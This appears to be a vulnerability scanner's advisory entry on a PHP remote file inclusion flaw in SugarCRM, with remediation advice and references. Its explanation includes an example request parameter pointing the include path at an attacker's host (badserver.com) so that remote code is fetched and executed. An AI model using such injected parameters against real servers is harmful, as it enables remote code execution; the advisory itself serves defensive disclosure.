504807 : Script Allows PHP Injection (SugarCRM)

Risk 5 : Web Services

Remote attackers may be able to execute arbitrary PHP commands on the web server.

PHP (Hypertext Preprocessor) is a scripting language used for web development. PHP scripts can be embedded into HTML files, and are run by the web server when the file is requested by a web browser.

Some PHP scripts do not adequately control important variables such as the directory path to supporting scripts. A remote attacker is able to manipulate these variables by sending specially crafted HTTP requests, thereby allowing the attacker to run arbitrary PHP scripts.

For example, a PHP script may include the following code: include($root_dir . 'common.php'); and the default value of the variable $root_dir may be /var/www/php. In this case, the PHP processor should execute the script /var/www/php/common.php within the current script.

Now suppose an attacker who owns a web server called badserver.com runs the script with the input parameter: root_dir=http://badserver.com/ In this case, the PHP processor would execute the script http://badserver.com/common.php. The attacker could execute arbitrary code on the vulnerable server by placing the code into the common.php file on his or her own server.

For more information on this and other PHP scripting vulnerabilities, see [http://www.phpadvisory.com/articles/view.phtml?ID=5] On the Security of PHP by Jordan Dimov and [http://www.securityfocus.com/archive/1/218000] Bugtraq.

For more information on specific PHP injection vulnerabilities see the following advisories:

[http://archives.neohapsis.com/archives/fulldisclosure/2005-01/0115.html] SugarCRM


To fix this problem, all PHP scripts should properly initialize directory paths and other important constants, so they cannot be manipulated by attackers. Setting register_globals to off in the php.ini file may also protect against certain PHP injection vulnerabilities. For fix information on specific products, see the appropriate reference below. Note that in many of the affected software products, the same problem lies in more than one script, even if only one is reported here.

Saint Coorporation : 2010-04-14
New Search
Risk Factor
Start Date
End Date